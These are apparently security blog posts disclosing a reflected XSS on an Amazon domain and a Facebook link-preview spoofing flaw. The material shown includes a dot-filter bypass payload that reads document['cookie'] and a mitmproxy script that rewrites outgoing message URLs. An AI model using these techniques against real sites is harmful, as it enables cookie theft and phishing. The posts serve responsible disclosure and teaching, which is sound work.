On March 13th, using dnsrecon (https://github.com/darkoperator/dnsrecon) and a huge wordlist, I came across an Amazon domain (hireon.amazon.com) affected by a reflected XSS.
I don't usually write an article about an XSS vulnerability, but I would like to share a trick I discovered during this analysis.
When I requested a non-existent resource, the following error message was displayed on the web page.
To show an alert box with the current domain name (or cookies) I would normally have used "document.domain" or "document.cookie", but because the dot character was filtered I had to find an alternative. At that point I tried to access the document object like an associative array (as shown in the following screenshot) and was able to display the current domain name inside the alert box.
document["domain"] or document["cookie"]
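As a quick sketch of the idea (the vulnerable parameter itself is not shown here, so the encoding step is purely illustrative), the dot-free payload can be built and percent-encoded before being placed in the reflected parameter:

```python
from urllib.parse import quote

# Bracket notation references document properties without the filtered
# "." character: document["domain"] instead of document.domain.
payload = 'alert(document["domain"])'
assert "." not in payload  # the dot filter no longer applies

# Percent-encode the payload so it survives inside a URL parameter.
encoded = quote(payload, safe="")
print(encoded)
```

The same trick works for any property, e.g. `document["cookie"]`, since JavaScript treats dot access and bracket access as equivalent.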
On March 21st, Amazon changed the domain name to livecode.amazon.jobs, but the XSS was still there.
Finally, on March 26th, the XSS was completely fixed.
- March 13th - First contact
- March 21st - Domain changed, but the vulnerability was still present.
- March 26th - Fixed
I have often wondered how link generation is implemented by major social network applications and, more specifically, how preview generation works.
Some time ago a friend of mine was spear-phished with a message through the Facebook chat; this happened before Facebook restricted the exchange of messages to people connected as friends. While I was analyzing the message, I noticed that it looked like a legitimate one, with a link to a newspaper page, a title, a body and an image, but the small gray text area below the description showed a pseudo-randomly generated domain, much like the kill-switch domain used by the WannaCry ransomware.
Searching on Google I found out that someone had already reported a similar finding to the Facebook security team, but it was not exactly the issue I discovered; they were only talking about the ability to inject arbitrary URLs inside OpenGraph tags. So I decided to dig into it and figure out something more.
The Facebook chat and board features generate a preview box whenever someone writes a full URL in a message; the Facebook crawler scans the target website, reads markup parameters such as og:title and og:description along with an icon of the page, and returns a preview box. This is part of the well-known OpenGraph markup, nothing new.
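As an illustration of what such a crawler does (a minimal sketch, not Facebook's actual implementation), extracting OpenGraph data boils down to collecting the `<meta property="og:...">` tags from the page head:

```python
from html.parser import HTMLParser

class OpenGraphParser(HTMLParser):
    """Collect <meta property="og:..." content="..."> tags from a page."""
    def __init__(self):
        super().__init__()
        self.tags = {}

    def handle_starttag(self, tag, attrs):
        if tag != "meta":
            return
        attrs = dict(attrs)
        prop = attrs.get("property", "")
        if prop.startswith("og:"):
            self.tags[prop] = attrs.get("content", "")

# Example page fragment, similar to what a news site would serve.
html = '''
<head>
  <meta property="og:title" content="Example headline" />
  <meta property="og:description" content="Example description" />
  <meta property="og:url" content="http://www.example.com/article" />
</head>
'''
parser = OpenGraphParser()
parser.feed(html)
print(parser.tags["og:title"])        # becomes the preview box title
print(parser.tags["og:description"])  # becomes the preview box body
```

The crawler side is therefore straightforward; the interesting part is what the client is trusted with, as shown next.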
What I didn't expect is that the Facebook web application uses the data the client sends to generate the URLs inside the preview box.
Getting hands dirty
Starting Burp Suite, a web application security tool, I began intercepting all the traffic from and to the platform; we'll use repubblica.it, an Italian newspaper, as a target.
Note: I tested it by sending messages to myself, so as not to violate the white-hat disclosure rules.
Look at those URLs, what happens if we change them?
And after forwarding the message:
The original URL, the icon, the title and the body are taken directly from the repubblica.it website, except for that little gray text below: "google.it". When we click on it we get:
At this stage we know:
- The output URL is whatever we send in the AJAX POST request.
- URLs are not encoded.
- The server does not validate that the input URL is the same one we typed.
- The server does not detect the mismatch introduced by our tampered request.
But we need to go a little further: to achieve a perfect, standalone proof of concept, we need to perform those actions at runtime, without manually interrupting outgoing HTTP requests and without interactive tools like Burp or OWASP ZAP.
Mitmproxy to the rescue!
Mitmproxy is a Python tool that acts as an HTTP proxy, like Burp Suite, but with the ability to change every aspect of an HTTP request or response at runtime; it can even be used as an interactive console to inspect and modify HTTP requests. That's exactly what we were looking for.
We wrote a small Python script that takes everything sent in the POST request to the /messaging/send endpoint and replaces every original URL (www.repubblica.it) with ours (www.voidzone.it) using a regular expression.
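The script below is a minimal reconstruction of that idea (the endpoint path and hostnames come from the article; the exact format of Facebook's request body is assumed): mitmproxy loads the module and calls request() once for every intercepted HTTP request, and we rewrite the body on the fly.

```python
import re

# Hostnames from the article; the rewrite is a plain regex substitution.
ORIGINAL = re.compile(r"www\.repubblica\.it")
REPLACEMENT = "www.voidzone.it"

def request(flow):
    """mitmproxy hook: called once per intercepted HTTP request."""
    # Only touch the message-send endpoint; leave everything else alone.
    if "/messaging/send" in flow.request.path and flow.request.text:
        flow.request.text = ORIGINAL.sub(REPLACEMENT, flow.request.text)
```

Saved as, say, rewrite.py (a name chosen here for illustration), it can be loaded with `mitmproxy -s rewrite.py`; the browser then talks to Facebook through the proxy, and every outgoing message is rewritten transparently.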
Since the server apparently does not accept URL parameters, I configured my website to perform a permanent redirect to a YouTube video, so no GET parameters are needed.
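One simple way to set up such a redirect (assuming an Apache host with .htaccess enabled; any server-side 301 works equally well, and the target URL here is just the obvious example):

```apache
# .htaccess: permanently redirect every request to the target video,
# so the tampered preview URL carries no GET parameters of its own.
RedirectMatch 301 ^/.*$ https://www.youtube.com/watch?v=dQw4w9WgXcQ
```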
Next, we fire up our proxy
And just try to resend the same message:
And if we click it
Yeah you just got rick roll'd :)
The Facebook security team is already aware of this issue, and this is their response:
So they consider it a "low-impact risk" and most probably will not fix it.
I'm still trying to figure out why a content-based social network like Facebook does not take a content vulnerability like this seriously, marking it as "low risk" even after I reported that someone is already using it to steal Facebook credentials.
Please note: this vulnerability was also found in the Facebook dashboard section.
So what we learned from this is that Facebook seems not to validate input URLs, allowing any malicious user to tamper with URL previews and inject arbitrary content.